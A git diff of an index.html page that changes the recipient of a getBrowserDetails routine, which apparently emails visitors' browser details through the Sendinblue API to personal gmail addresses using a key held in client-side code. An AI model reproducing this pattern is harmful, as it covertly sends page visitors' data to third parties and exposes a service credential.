--- a/index.html
+++ b/index.html
@@ -35,7 +35,7 @@ function getBrowserDetails() {
           'api-key': sendinblueApiKey
         },
         body: JSON.stringify({
-          'to': [{'email': 'cisalov109@jthoven.com'}],
+          'to': [{'email': 'aagortey@gmail.com'}],
           'subject': 'Browser Details',
           'htmlContent': consoleData,
           'sender': {'email': 'igotapps650@gmail.com'}
